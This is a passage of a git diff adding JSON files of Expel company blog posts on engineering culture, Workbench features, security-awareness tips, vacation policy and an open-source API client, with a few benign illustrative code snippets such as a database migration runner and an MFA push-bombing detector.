running\u2014but don\u2019t expect to go it alone. In your first week, you can expect to commit code to production (from the comfort of your own home), but a group of people will come together to make it happen. It\u2019ll go something like this: Prior to day one, you\u2019ll get a new laptop, monitors, keyboard, trackpad, and dock in the mail. You\u2019ll also have access to some discretionary funds to make your home office sparkle. Daren\u2019s home office setup On your first day, someone from IT will guide you and other new Expletives through laptop and account setup. IT works hard to make this a fairly painless process, so things will probably work out of the box (if they don\u2019t, IT is always just a Slack message away). 
When joining the Engineering department, one of the first people you\u2019ll meet with over Zoom is a member of the Core Platform team to walk you through setting up your dev environment. Spoiler alert: I\u2019m a big fan of this team. They treat the rest of engineering as well as we treat our customers\u2014and they aren\u2019t alone. There are several teams at Expel whose primary mission is enabling the rest of us. Just check out this screenshot of a chat I had with one of our managers of site reliability engineering (SRE), Reilly Herrewig-Pope (hey, Reilly ), early on: Right off the bat, your manager provides a list of tasks and resources to help you get up to speed. For example, you can browse several recorded videos where subject matter experts introduce a cornerstone of Expel\u2019s tech stack\u2014which they helped design and build. Then, when you feel ready, one of your new teammates will hand-pick and shepherd you through your first issue. This is when the real fun begins\u2026 Completed Jira ticket, five days after Daren\u2019s start date TIL in year one We move fast and trust our tech At Expel, we use Gitflow for several of our primary repositories. All code is peer reviewed, checked for proper test coverage, and eventually merged into the develop branch\u2014kicking off continuous integration and continuous delivery (CI/CD) and ending in a deployment to our staging environment. We cut and merge a new tagged release every day from develop to main, which deploys the latest code to production. These daily releases require trust in the process and infrastructure to catch and handle human errors. I learned this lesson early on. On my third day, I pushed a bad database (DB) migration that would\u2019ve broken our staging environment. Not only did the automated migration process catch the error and rollback the transaction protecting the DB, but when the first Kubernetes pod failed to run the migration, the existing pods stayed live and didn\u2019t deploy the broken image. Staging kept working as expected for everyone depending on it, while I chased down and patched my bug. It was a huge relief to know that I had a safety net I didn\u2019t have earlier in my career because Expel invested in resilient infrastructure. Having a talented group of SREs designing, building, and maintaining a system that protects us from ourselves is only one part of what makes our daily release cycle work. Every feature team at Expel has a dedicated quality assurance (QA) engineer who considers each issue that needs testing carefully. I pride myself on attention to detail, but, more often than not, our QA still finds edge cases I didn\u2019t consider. That\u2019s because their involvement begins long before I merge code and mark an issue as pending acceptance. Our QAs take part in backlog grooming, where they help define testable acceptance criteria and ask questions. This pushes us to confront the devil in the details with all stakeholders present, so that we don\u2019t waste time writing code based on incorrect assumptions. We\u2019re still a startup If you want to maintain legacy Java code, or push pixels and patch bugs for a PHP application in LTS, this gig might not be for you. Similarly, if you like being a Software Engineer II and knowing that, if you meet your commit quota, you\u2019ll be eligible for Software Engineer III in two years\u2014this probably isn\u2019t for you. 
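Circling back to that migration safety net for a second: the pattern that saved me boils down to running schema changes inside a single transaction and rolling the whole thing back if anything fails. Here's a rough, hypothetical sketch of that idea using psycopg2 against Postgres — it's not our actual migration tooling, just the shape of it.

```python
# Hypothetical sketch of a transactional migration runner: if any statement
# fails, everything rolls back and the database is left exactly as it was.
# Table and column names are made up for illustration.
import psycopg2

MIGRATION = [
    "ALTER TABLE alerts ADD COLUMN triaged_at timestamptz",
    "CREATE INDEX idx_alerts_triaged_at ON alerts (triaged_at)",
]


def run_migration(dsn: str) -> bool:
    conn = psycopg2.connect(dsn)
    try:
        with conn:  # commits on success, rolls back if the block raises
            with conn.cursor() as cur:
                for statement in MIGRATION:
                    cur.execute(statement)
        return True
    except psycopg2.Error as exc:
        print(f"migration failed and was rolled back: {exc}")
        return False
    finally:
        conn.close()
```

Because Postgres DDL is transactional, a typo in the second statement can't leave you with a half-applied schema — the same kind of behavior that kept staging alive while I chased down my bug.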
Even though Expel is no longer a handful of people in a barn with a dream and a whiteboard, it still feels scrappy out of necessity. Our chips are on the table behind two very ambitious bets that require constant evolution and development: We integrate with damn near anything, and We empower humans with the data to make sound judgements, and automate the rest. These bets are what keep things interesting, and demand creative problem solving from our engineers. We have swimlanes but don\u2019t operate in silos To build complex systems, software engineers rely on abstraction to hide complexity behind well-defined interfaces. There\u2019s a parallel to this in how our teams are structured at Expel. As an application developer, I don\u2019t bear the principal responsibility for designing user interfaces (UIs), setting sprint priorities, or managing infrastructure. Instead Expel offers me a seat at the table, where I can collaborate with designers, product managers, and SREs to build software that solves the highest-priority problems in a way that\u2019s scalable. Through these relationships, I\u2019ve grown my skills in all of these disciplines and, more importantly, my ability to effectively communicate with people in these roles. We run towards the fire We have a Slack channel called \u201cgotime.\u201d This is where high-visibility incidents are first reported before they\u2019re spun-off into dedicated channels and Zooms. One of the most remarkable affirmations of Expel\u2019s culture is the number of people that join the fight immediately following one of these incidents\u2014regardless of who is responsible or who owns the code. Our support of one another extends beyond incidents. Whenever I need help, I always find someone willing to lend a hand. There\u2019s a lot to like about Expel, but the people I have the privilege to work with will always be at the top of that list for me. Opportunities for personal growth In addition to the growth we experience on the day-to-day (that\u2019s the nature of the job), Expel encourages us to attend one conference per year and provides a budget of $2,500 to make that happen. This year, I flew out to San Jose for a Postgres conference. I was honestly surprised by how simple it was to get the trip approved, book travel, and submit expenses. Not to mention, we have access to tools like Pluralsight for curated online training. But access to material isn\u2019t enough. You also need time and space to invest in continued education. My team let me spend an entire sprint building a foundation in one of the JavaScript (JS) frameworks we use, so that I could approach future issues with more experience and confidence. FYI: we write the majority of our applications in Go, JS, or Python, which gives you the opportunity to become (or remain) proficient in three in-demand languages. Every quarter, we set aside two days called Expel-oritory Time (remember this from the intro?), where the entire product organization can work on whatever they want. Folks often elect to form small, cross-team groups to hack away on some experimental feature, explore our data in a new and interesting way, or use the time to write a blog post\u2014like this one. (Side bar: while I can\u2019t yet speak from experience, we also have a 12-month BUILD program for managers, designed to give you practical skills through ongoing learning and practice.) \u2026and professional growth Like I\u2019ve said, transparency is foundational at Expel. 
Information normally held close to the chest at other companies, like compensation or the state of the business, is shared openly. That principle applies to our workplace relationships as well. I have candid 1-on-1s with my manager every week where we discuss how things are going, any obstacles she can help me overcome, and what the next steps are for my journey at Expel and beyond. She\u2019s transparent about my performance, and we chat openly about challenges I\u2019m facing and what I should focus on to reach the next milestone in my career. From day one, I\u2019ve had someone in my corner considering my individual circumstances, who never made me feel like a replaceable cog in a corporate machine. We\u2019re building a product that meets customers where they are in their security journey, which means we need people with different points of view at the table. It\u2019s part of the reason equity, inclusion, and diversity are hugely important at Expel\u2014it\u2019s another one of those core beliefs: \u201cbetter when different.\u201d We\u2019re a stronger organization when we recognize, celebrate, and learn from those whose backgrounds and perspectives are different from our own. We also have four employee engagement groups (ERGs) to support that: BOLD (for Black employees), WE (for the women of Expel), The Treehouse (for LGBTQ+ employees), and The Connection (for mental wellbeing)\u2014all of which are open (and welcoming) to allies. We\u2019ve added more than 180 new Expletives since I started, and there are a whole lot of open positions and opportunities for career advancement (BTW, we\u2019re hiring ). You won\u2019t be pigeonholed here. The opportunity to apply for new roles arises often, giving you a chance to find your perfect fit or try something new. Looking back (and ahead)\u2026 I knew from the interview process that Expel was the right choice for me\u2014and my confidence in that choice has only grown over my first year. Most professions require some amount of continued education, but the pace of change in software engineering takes this requirement up a notch. Working for a company that understands the value of investing in their workforce, and that provides the necessary space and time to experiment, truly supports my personal and professional growth. Every job comes with a unique set of challenges and Expel has no shortage of hard problems. The difference\u2014and the reason I\u2019m looking forward to year two\u2014are the people I get to face down those challenges with. If I\u2019ve sold you on Expel, or you think it\u2019s too good to be true and want to ask some questions, check out our open jobs . If you\u2019re anything like me, you won\u2019t be disappointed." 
+} \ No newline at end of file diff --git a/add-context-to-supercharge-your-security-decisions-in.json b/add-context-to-supercharge-your-security-decisions-in.json new file mode 100644 index 0000000000000000000000000000000000000000..2d815be43e18ef0ac3b1102d7fdbc93f2432d665 --- /dev/null +++ b/add-context-to-supercharge-your-security-decisions-in.json @@ -0,0 +1,6 @@ +{ + "title": "Add context to supercharge your security decisions in ...", + "url": "https://expel.com/blog/add-context-to-supercharge-your-security-decisions-in-expel-workbench/", + "date": "5 days ago", + "contents": "Subscribe \u00d7 EXPEL BLOG Add context to supercharge your security decisions in Expel Workbench Security operations \u00b7 2 MIN READ \u00b7 PATRICK DUFFY \u00b7 MAY 12, 2023 \u00b7 TAGS: Cloud security / MDR / Tech tools Defenders need so much information to make good security decisions in the security operations center (SOC). Situations constantly evolve\u2014employees join and leave the org, new technology gets onboarded, unexpected risks surface, and so much more\u2014it\u2019s hard for the SOC to keep up with ever-changing conditions throughout the organization. The good news is that all of these changes create contextual information that Expel and our customers use to make smart decisions. The more we know about your environment and your users, the easier it is for our software\u2014and by extension our SOC analysts\u2014to determine which events require remediation. With this in mind, we\u2019ve introduced a new capability which allows you to add business context to Expel Workbench\u2122 that helps our SOC team reduce the time-to-decision on alerts and relieve the burden on your team. Adding context to Workbench Here\u2019s how it works: On the \u201cContext\u201d page in Workbench, users can add new context and see all existing context that has been previously added by your organization or our SOC team. Think of context as information about a user or situation that\u2019s helpful to know when making a decision about a security alert. It\u2019s like a virtual sticky note with directions like: Every time you see user X, be aware that they often travel outside the country. This gives Expel important information about the user\u2019s location that could help quickly resolve alerts generated about logins from different countries when traveling. On this page, you can edit context, add descriptions and notes, change users and more. You can also see a history of who created the context, who updated it, and when, and you can create categories to quickly group and find types of context being added in Workbench. You can also upload lists of context, like IP addresses or emails that belong to specific groups. Highlight essential information Once added, you can highlight this context in Workbench to call attention to important pieces of information. This serves as a digital sticky note for analysts to share information and learnings about an environment. For example, if we know that specific prefixes are used for admin hosts, we can add context calling out that host is an admin to provide situational awareness so analysts can make the right call on whether and how to act on an alert. This is visible to Expel SOC analysts and customers, meaning you have insight into how analysts work alerts, investigations, and incidents. More valuable ways to add context Context allows you to easily make updates as employees leave the organization or change roles. 
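If it helps to picture what those virtual sticky notes amount to, here's a minimal sketch of context entries as plain records, plus a lookup an analyst (or a bot) could run at triage time. The field names and categories are invented for this sketch — they're not the Workbench schema.

```python
# Illustrative only: context entries as simple records, plus a lookup used at
# triage time. Field names and categories are invented for this sketch and do
# not reflect the actual Expel Workbench schema.
from dataclasses import dataclass


@dataclass
class ContextEntry:
    category: str  # e.g. "travelers", "admin-hosts"
    value: str     # the user, host prefix, etc. the note applies to
    note: str      # what to keep in mind when this value shows up in an alert


CONTEXT = [
    ContextEntry("travelers", "user X", "often travels outside the country"),
    ContextEntry("admin-hosts", "adm-", "hosts with this prefix are admin workstations"),
]


def context_for(value: str) -> list:
    """Return any context entries that match the value exactly or as a prefix."""
    return [c for c in CONTEXT if value == c.value or value.startswith(c.value)]


# e.g. context_for("adm-fileserver01") surfaces the admin-host sticky note
```

The point isn't the code — it's that once this knowledge lives somewhere structured instead of in someone's head, every alert about that user or host arrives with the note already attached.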
For example, you can add context for the CEO\u2019s email address along with specific intel into Workbench, knowing that CEOs are often targets of phishing attacks. If the CEO leaves the org, you can update or remove the email address and all the associated detections and workflows update automatically. Another way to use context is to make note that specific indicators of compromise (IOC) have been linked to a threat actor within the environment. For example, the SOC can take note that the auto host containment remediation action needs to be taken immediately if a specific IOC is seen as alert. For example, if they see the domain faceb00k.com using zeroes instead of O\u2019s. Making Expel work for you Context is just one more way to customize Expel to your specific environment. Be sure to check out the Context page under Organizational Settings to see what context you already have in place and consider additions that would be helpful." +} \ No newline at end of file diff --git a/an-easier-way-to-navigate-our-security-operations-platform.json b/an-easier-way-to-navigate-our-security-operations-platform.json new file mode 100644 index 0000000000000000000000000000000000000000..ddc06c01f146d816a56d92a2a02326fb3fb9dc9e --- /dev/null +++ b/an-easier-way-to-navigate-our-security-operations-platform.json @@ -0,0 +1,6 @@ +{ + "title": "An easier way to navigate our security operations platform ...", + "url": "https://expel.com/blog/an-easier-way-to-navigate-our-security-operations-platform-expel-workbench/", + "date": "Apr 4, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG An easier way to navigate our security operations platform, Expel Workbench Security operations \u00b7 4 MIN READ \u00b7 KIM BIELER \u00b7 APR 4, 2023 \u00b7 TAGS: MDR / Tech tools When it comes to security operations, speed and ease-of-use are critical for making the best decisions and judgments quickly. It\u2019s important that analysts see what they need to see, and can get to the information they need as intuitively as possible. That\u2019s why we\u2019re excited to announce upgrades to the navigation within our security operations platform, Expel Workbench\u2122. Our offerings and capabilities have evolved as the security needs of our customers have grown, so we redesigned the navigation to make it even easier for our clients to manage security operations. The new design makes navigation within Workbench even more flexible, easy-to-use, and downright good looking. And the kicker is that these changes were all driven by you\u2014our customers. Let\u2019s take a look at what\u2019s new. Sidebar navigation The most noticeable change is that we shifted the horizontal navigation to the sidebar. This gives us more room for the essential tools we offer today and the capabilities we plan to build in the future, and makes it easier for you to get to the tools you need, fast. Alert ticker You\u2019ll also notice we\u2019ve moved the alert ticker to the top of the interface, which makes it easier to see the most essential information first. The alert ticker links directly to all critical, high, medium, low, and tuning alerts, and is ever-present throughout Workbench for easy access. Custom detection rules We moved the Custom Detection Rules view from our Settings page to our Detections page. This improvement helps you better understand what will raise Expel alerts in your environment, in addition to any custom lookout, add-to investigation, and noisy alert suppressions created. 
New location for Actions One of the most important questions our customers ask when working with Expel\u2019s security operations center (SOC) during an investigation or incident is, \u201cWhat\u2019s on our team\u2019s plate?\u201d We\u2019ve made it simple to get to that to-do list by moving our Actions page to the top of our information architecture in the navigation. With one click, you now see all outstanding to-do items for the team, Expel\u2019s SOC, or our bots, for any investigation or incident. Breadcrumbs Sometimes you go down a rabbit hole, checking out all the awesome work done during an investigation or incident\u2014we get it. We\u2019ve introduced breadcrumbs at the top of each page to make it simple to jump back to the starting point of your journey through Workbench. Why we made these changes We continuously ask ourselves: how can we make our users\u2019 jobs easier and their experience in the product more intuitive? We spoke to customers, collected feedback and discovered new ways to simplify how clients use the product today and provide flexibility for how the product will expand in the future. Our mission with the new navigation design therefore centered around four goals: Use navigation space more efficiently and provide room to grow. Create a high-level information architecture that makes even more sense. Reduce clicks to the important and frequently used parts of the platform. Align Workbench with the brand palette and iconography. Since we launched, we\u2019ve scaled Workbench significantly to keep up with ever-evolving security needs. We\u2019ve added half a dozen dashboards; entire new offerings like threat hunting , phishing , and managed detection and response (MDR) support for Kubernetes ; and tools like context, configurable notifications, and the NIST CSF. The original horizontal navigation could no longer expand to accommodate existing features, never mind the accelerating pace of enhancements and new offerings we knew were coming soon. We wanted to make ground-breaking features like the detections strategy UI and additional offerings like hunting easier to find and use. When customers have a consistently good experience across touchpoints, that creates a sense of assurance and trust\u2014which is especially critical in security, when customers are trusting us to keep their organization safe. That\u2019s why the colors and icons you see on the website now carry through to our Workbench platform. How this helps you We hope that the new navigation makes your work easier and faster. We know that this is an essential tool you use every day\u2014so making it even more enjoyable to use will improve your workflow and help keep your organization safe. Here are a few specific details we think you\u2019ll appreciate: The features are there when you need it, and out of the way when you don\u2019t. You can get where you want to go with fewer clicks. It\u2019s easier to see how the platform is structured and where you are in that structure. More of the features are visible and discoverable. A glimpse into the design process To ensure our new Workbench navigation design aligns with your needs, we followed the proven user experience process of research, iteration, testing, and change management. Research: We had a lot of hunches and opinions about what needed to change, but we weren\u2019t designing for ourselves. So early on we conducted a card-sorting exercise with our customers, asking them to sort the features and categorize them. 
This research helped us understand what needed to be visible in the main navigation versus what could be listed in the secondary navigation. Iteration: There\u2019s never one right way to solve a design problem. The team experimented with different layouts, colors, icon choices, and organizational schemes. Testing: A key concern for the redesign was how it would affect analyst efficiency. We\u2019re proud of our response times, and if the new navigation slowed analysts down by even a second per alert, that could meaningfully affect our service level objectives (SLOs), which was out of the question. So we did a staggered release to the SOC and had analysts kick the tires for several weeks while we watched efficiency metrics. Change management: A project like this doesn\u2019t get designed, built, and released overnight. It\u2019s a change management effort that involved months of communication, resourcing and planning discussions with engineering, and the creation of a tiger team to execute the design and plan the roll-out. Check it out If you haven\u2019t logged into Workbench since this update, I encourage you to jump in and explore." +} \ No newline at end of file diff --git a/an-expel-guide-to-cybersecurity-awareness-month-2022.json b/an-expel-guide-to-cybersecurity-awareness-month-2022.json new file mode 100644 index 0000000000000000000000000000000000000000..c63f1a51204564b4ce4ba9ce1b5d06f613b9c9de --- /dev/null +++ b/an-expel-guide-to-cybersecurity-awareness-month-2022.json @@ -0,0 +1,6 @@ +{ + "title": "An Expel guide to Cybersecurity Awareness Month 2022", + "url": "https://expel.com/blog/expel-guide-to-cybersecurity-awareness-month-2022/", + "date": "Oct 4, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG An Expel guide to Cybersecurity Awareness Month 2022 Tips \u00b7 5 MIN READ \u00b7 GREG NOTCH \u00b7 OCT 4, 2022 \u00b7 TAGS: MDR Fall is in the air, which can only mean one thing: Cybersecurity Awareness Month is here. Every year, the National Cybersecurity Alliance (NCA) and the Cybersecurity and Infrastructure Security Agency (CISA) use October to share information and important resources to help people stay safer and more secure online. It\u2019s a favorite for us at Expel because it\u2019s about education and awareness at a time that isn\u2019t a reaction to the cyber-threat or attack du jour. Instead, we can take a step back to share information and resources within the defender community and anyone with an online presence\u2014which, let\u2019s face it, is just about everyone. Expel is also a proud Champion of Cybersecurity Awareness Month 2022 \u2014a collaborative effort among businesses, government agencies, colleges and universities, associations, nonprofit organizations, and individuals committed to improving online safety and security for all. This year, the CISA and NCA are promoting four key security behaviors to help equip everyone, from consumers to corporations, to better protect their data. To support this initiative, we\u2019ve curated some Expel resources to help your organization improve its cybersecurity posture\u2014this month, and beyond. 1. ICYMI: always enable multi-factor authentication (MFA), but also have a back-up plan. At this point, enabling MFA (when available) should be a no-brainer. But, we also know that MFA isn\u2019t always a silver bullet for protecting your environment. Our security operations center (SOC) has seen examples of this in the wild. 
We\u2019ve responded to phishing attacks that used a man-in-the-middle tactic to send users to a fake Okta login page. (Check out how it went down here .) We\u2019ve also seen attackers use BasicAuthentication to bypass MFA and target access to human capital management systems . Based on these novel incidents, here are a few lessons learned you can apply to your own organization: Deploy phish-resistant MFA wherever possible. If FIDO-only factors for MFA are unrealistic, disable email, SMS, voice, and time-based, one-time passwords (TOTPs). Instead, opt for push notifications. Then configure MFA or identity provider policies to restrict access to managed devices as an added layer of security. (More on this in our Quarterly Threat Report for Q2 2022 .) Enforce MFA prompts when users connect to any sensitive apps via app-level MFA. Don\u2019t let your sensitive apps (think: Okta, Workday, etc.) be a one-stop shop for attackers. To take it a step further, tell your users to always review the source of the MFA request (if via push notification) to verify the login isn\u2019t from an unusual area\u2014and if it is, encourage your people to report strange requests. Finally, be wary of brute force MFA requests, which involve an attacker continuously sending push notifications to the victim until they accept. Let your users know this is something to watch out for. 2. Don\u2019t rely on your memory or Sticky Notes to keep track of all your passwords. This year, a global survey conducted by open-source password manager, Bitwarden, revealed that 55% of people rely on their memory to manage passwords . Of those surveyed, only 32% of Americans were required to use a password manager at work. We know that memory can be fickle at best. Password managers are a great way to keep organized for anyone creating multiple (if not dozens) of usernames and passwords to do their job, but they can be difficult for your IT team to enforce. Instead, many businesses opt for a single sign-on (SSO) solution to allow employees to sign into an approved account one time for access to all connected apps. However, easy access for users also makes SSO services a popular target for attackers\u2014it\u2019s part of the reason business application compromise (BAC) attacks are evolving . Regardless, it\u2019s never a bad idea to encourage employees to create strong, unique passwords for different sites/apps, and of course\u2014we can\u2019t say this one enough\u2014enable MFA whenever possible. Want to be able to forget your passwords? Installing a password manager will help generate strong passwords, keep your accounts safer, and save you from memorizing countless strings of characters. Plus, it makes it easier to deal with constantly changing passwords for sites whose accounts have been compromised. BTW, we\u2019ve compiled more tips for maintaining security and privacy at home for remote workers (because, let\u2019s face it, that\u2019s most of us these days), as well as effective ways to encourage more secure behaviors . 3. Stop ignoring that \u201csoftware updates available\u201d notification. For security professionals, this might sound like an obvious one, but patching and updating software regularly can help prevent attacks. Vendors are constantly plugging security holes and patching bugs, some of which might represent entry points for attackers. 
A lot of operating systems and app stores will do this for you automatically, but keep an eye on those notifications prompting an update\u2014pushing it off might be convenient now, but cost you down the line. Updates to web browsers are particularly important, so try to install those right away. So how do you ensure your team keeps up with these updates? Try a combination of gamification and education. Entering employees into raffles for gift cards or other perks for applying OS updates is a generally inexpensive way to reduce risk for your organization and keep folks happy. (FYI: more tips like this from industry leaders grappling with similar challenges from Forbes , including this same sage advice from our own co-founder and CEO, Dave Merkel.) 4. Help your organization avoid taking the bait on a costly phishing scam. Recognizing and reporting phishing schemes is one of the first lines of defense when it comes to protecting your organization. We\u2019ve seen this in our SOC on countless occasions, from attackers targeting Amazon Web Services (AWS) login credentials , to malware-poisoned resum\u00e9s aimed at job recruiters \u2014and everything in between. We\u2019ve also seen how these campaigns can reveal larger, more malicious business email compromise (BEC) attacks if they aren\u2019t stopped in their tracks (get the full rundown on that incident here ). Fortunately (or not), Expel\u2019s Phishing team reviews hundreds of emails a day and thousands of emails weekly, so we\u2019ve picked up a few things about how to protect your organization, including: Prevention starts with proper training. Make sure employees learn to recognize potential red flags associated with phishing emails when they land in their inbox. Even if this means an investment on your part, it\u2019ll pay dividends in the long run. Spend time on education for specific business units on the phishing campaigns that might target them. Finance teams might encounter financial-themed campaigns with subject lines, such as \u201cURGENT:INVOICES,\u201d while recruiters may see resum\u00e9-themed lures. Once they know what to look for, make it easy for people to report suspicious activity. An effective way to do this is through a system for employees to validate suspicious emails or texts. This allows IT to provide guidance to the individual, and gives security team members enough insight to identify trends to sniff out a larger scale attack early on. (More on preventing these scams like this here .) We know. There\u2019s a lot to unpack here, and there\u2019s probably more we didn\u2019t include for the sake of space and your sanity. But hopefully these resources provide a glimpse into some of the ways you can help your organization toward an overall better security posture\u2014even after October. We\u2019re just getting started for Cybersecurity Awareness Month. Check out our #BeCyberSmart resources for curated content to follow along." 
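P.S. One more note on tip #1: the "brute force MFA requests" trick — sometimes called push bombing — is surprisingly easy to spot if you simply count prompts per user over a short window. Here's a rough sketch of that detection idea; the event shape, threshold, and window size are assumptions made for illustration, not a description of any particular product's telemetry.

```python
# Rough illustration of spotting MFA "push bombing": flag any user who piles up
# an unusual number of push prompts in a short window. Event shape, threshold,
# and window size are assumptions made for this sketch.
from collections import defaultdict
from datetime import timedelta

WINDOW = timedelta(minutes=10)
THRESHOLD = 5  # prompts inside the window before we raise a flag


def flag_push_bombing(events):
    """events: iterable of {"user": str, "time": datetime, "type": str}, sorted by time."""
    recent = defaultdict(list)
    flagged = set()
    for event in events:
        if event["type"] != "mfa_push":
            continue
        prompts = recent[event["user"]]
        prompts.append(event["time"])
        # keep only prompts still inside the sliding window
        recent[event["user"]] = [t for t in prompts if event["time"] - t <= WINDOW]
        if len(recent[event["user"]]) >= THRESHOLD:
            flagged.add(event["user"])
    return flagged
```

Pair a check like this with user education ("don't approve prompts you didn't ask for, and tell us when you see them") and you cover both the detection and the human side of the problem.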
+} \ No newline at end of file diff --git a/an-inside-look-at-what-happened-when-i-finally-took.json b/an-inside-look-at-what-happened-when-i-finally-took.json new file mode 100644 index 0000000000000000000000000000000000000000..f8da24bb5bf0e3e0ea60b9eb2d0da21f981e7601 --- /dev/null +++ b/an-inside-look-at-what-happened-when-i-finally-took.json @@ -0,0 +1,6 @@ +{ + "title": "An inside look at what happened when I finally took ...", + "url": "https://expel.com/blog/inside-look-what-happened-finally-took-vacation/", + "date": "Aug 6, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG An inside look at what happened when I finally took a vacation (for realsies) Talent \u00b7 5 MIN READ \u00b7 AMY ROSSI \u00b7 AUG 6, 2019 \u00b7 TAGS: Career / Employee retention / Great place to work / Management I\u2019ve got a confession: I\u2019m terrible at relaxing. In fact, one of my college entrance essays centered around the fact that I have a hard time sitting still. And I once had a roommate look at me and ask, \u201cDo you ever just sit down and do nothing?!\u201d Sure, sometimes I sit to watch Netflix and Hulu, but I\u2019m usually folding clothes or thinking about next week\u2019s carpool schedule for my kids at the same time. Let\u2019s just say I\u2019m grateful I discovered the many benefits of yoga years ago. But this blog post isn\u2019t about my struggle with knowing how and when to slow down . It\u2019s about what happened when I finally took a real vacation \u2014 one that involved me and my family with zero cell phone or internet services for a whole seven days. Our view on vacays At Expel, we believe in the importance of taking vacation. It\u2019s so important to us that we\u2019ve included it in our Palimpsest (no, we didn\u2019t make up a word ) \u2014 it\u2019s a document our executive team developed together, and it outlines what we value about our culture and describes the way we want to work with each other. Among many other attributes we value here, our Palimpsest makes it clear that all employees should feel not just comfortable but encouraged to take the vacation time they need. But here\u2019s the thing: Words are just words \u2014 in a Palimpsest or anywhere else \u2014 unless what you do aligns with what you say (and what you tell everyone else). The TL;DR is this: If I want other people on my team to take real vacations where they truly unplug and stop worrying about whatever\u2019s happening back at the office, then I\u2019ve got to do the same. There\u2019s nothing worse than the leader who wants people to do as they say and not as they do. So earlier this summer, I boarded a cruise ship in Galveston, Texas to spend a week in Cozumel, Costa Maya and Roatan with my extended family. I purposely didn\u2019t buy an international phone plan for the trip. And when someone asked if I wanted (outrageously priced) internet access on the ship \u2014 I declined. I declined! That meant no email, Slack, LinkedIn or Instagram for the entire vacation. The seven (not-so-obvious) things I learned from my time away There are plenty of things that happened on my vacation that anyone could\u2019ve predicted \u2014 all the stuff that\u2019s already been well-documented across the interwebs. Without emails and text messages and meeting invites to distract me, I focused on the people around me and got to appreciate the beauty of the ocean. I read the book Where the Crawdads Sing , practiced yoga and made a conscious decision not to worry about anything happening off the ship. 
I returned from my trip not just with a little more sun, but also some new perspectives \u2014 including why it\u2019s so important for execs to step away and take a real vacation. If you take real vacations, so will your team. A \u201creal vacation\u201d is one when you take multiple days away and you truly disconnect from the office. This doesn\u2019t mean you have to go anywhere exotic or fancy \u2014 staycations work too. For this particular vacation, I was gone for one week but others at Expel are committed to taking vacations that are at least two weeks. As our head of user experience, Kim Bieler, once explained to me, two weeks is a proper vacation and a game-changer for your well being. Whatever length of time you choose to take, be sure to talk about your vacations and share pictures and stories. Talking about it is another signal to your team that it\u2019s healthy and encouraged to take that break and unplug. Your team gets more opportunities to shine. While I was out, my team members stepped up and into work they don\u2019t normally do on a day-to-day basis. This was a great experience for them, both in stretching their own capabilities and determining if this new work is something they want to continue to do in the future. It also gave them more of an appreciation for and a front-row seat to what I manage on a day-to-day basis. You discover what you should\u2019ve been delegating all along. If your team can do it while you\u2019re out, they can do it when you get back. And handing the reins to your team frees you up to focus on new things. If you\u2019re scared that delegating some of the things you normally do makes you replaceable, you\u2019re right \u2014 but I prefer to think about this concept in a different way. If someone else in my org can step up and take on some of the programs and tasks I used to be responsible for, that means I\u2019ve built a great and capable team. And that\u2019s a wonderful thing for your business, your employees and you . You discover where you\u2019ve got process gaps. We\u2019ve hired lots of new Expletives lately, which means my team has only been working together for a few months. Stepping away showed me where we needed to improve our processes and better share information. For example we encourage everyone to attend at least one conference a year and we budget $2,500 per person for this experience. While I was out, my team raised some good questions on how to best use this benefit, which prompted us to write some additional guidance for our employees. Your team has more opportunities to build relationships. While I was cruising, the people on my team connected directly and more often with our exec team. I try to encourage those connections while I\u2019m in the office, but removing myself from the equation helped this happen even more naturally while I was out. You\u2019re reminded there are more ways than your way to get work done. I know it sounds obvious, but seeing work get done differently is good for so many reasons. One of my favorite parts of my job is coaching managers and helping them think differently about ways to grow and support the people on their teams. During these conversations I draw upon my experience and the techniques I\u2019ve developed over time, in the same way others on my team draw upon their own unique experiences. This means that the same conversation can have different outcomes based on the questions asked and guidance provided. 
Usually in these situations there isn\u2019t one right way, but many ways to get to an outcome. I enjoyed returning from vacation and learning from the coaching provided during my absence. You realize why it\u2019s so important to communicate to your team the difference between a vacation and trip. Many of us blend work and personal time when we go away. I take these kinds of \u201cblended\u201d trips when I visit California. I get the chance to spend time with my family and friends while still staying connected to the office to get work done. I don\u2019t consider these trips to be vacations, but if you look at this travel from the lens of a traditional PTO policy, it\u2019d require vacation hours. If you work at a company with a flexible time off policy, the lines start to blur so it\u2019s important to communicate in advance the type of away time you\u2019re taking. If the travel is for a trip, then fine \u2014 define your rules. If the travel is for a vacation \u2014 then be clear that you\u2019ll be disconnecting in order to protect your time away. Moral of the story: If you come work at Expel, we want you to take a vacation. For realsies. And if you choose not to come work with us, I hope I\u2019ve at least encouraged you to spend a few days fully disconnected. Do it for your own sanity and the development of your team. Now \u2026 off to get my Vinyasa on." +} \ No newline at end of file diff --git a/announcing-open-source-python-client-pyexclient-for.json b/announcing-open-source-python-client-pyexclient-for.json new file mode 100644 index 0000000000000000000000000000000000000000..4509cce0e318e614afa72fd2ced6247435d016aa --- /dev/null +++ b/announcing-open-source-python-client-pyexclient-for.json @@ -0,0 +1,6 @@ +{ + "title": "Announcing Open Source python client (pyexclient) for ...", + "url": "https://expel.com/blog/open-source-python-client-pyexclient-expel-workbench/", + "date": "Oct 27, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Announcing Open Source python client (pyexclient) for Expel Workbench Engineering \u00b7 2 MIN READ \u00b7 EVAN REICHARD, DAN WHALEN, MATT BLASIUS, PETER SILBERMAN, ROGER STUDNER, SHAMUS FIELD AND WES WU \u00b7 OCT 27, 2020 \u00b7 TAGS: Company news / MDR / Tech tools At Expel, we believe that human time is precious, and should be spent only on the tasks that humans are better at than machines \u2013 making decisions and building relationships. For the rest of the work, it\u2019s technology to the rescue. We\u2019ve built our platform, Expel Workbench\u2122, to provide an environment where our analysts can focus on high-quality decision making. In order to do this, we knew we needed the platform to be like fly paper for inventors \u2013 good ideas should be easy to experiment with and get into production. Everything you can do in our platform has a discoverable ( Open API FTW!), standard compliant ( JSON API anyone?) application-programming interface (API) behind it. If you can click it in the user interface (UI), you can automate it with client code. Internally at Expel, we\u2019ve been taking advantage of our APIs from the very beginning, but we\u2019ve always hoped to see customers do the same. Introducing pyexclient Today we\u2019re announcing the release of pyexclient , a python client for the Expel Workbench. We\u2019ve built on our learnings over the past few years and have beefed it up with documentation and lots of examples. 
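Before we walk through everything that ships with this release, here's roughly what a first session with the client looks like. Treat this as a minimal sketch: the WorkbenchClient entry point follows the pattern in the pyexclient docs, but double-check the constructor arguments and attribute names there before relying on them.

```python
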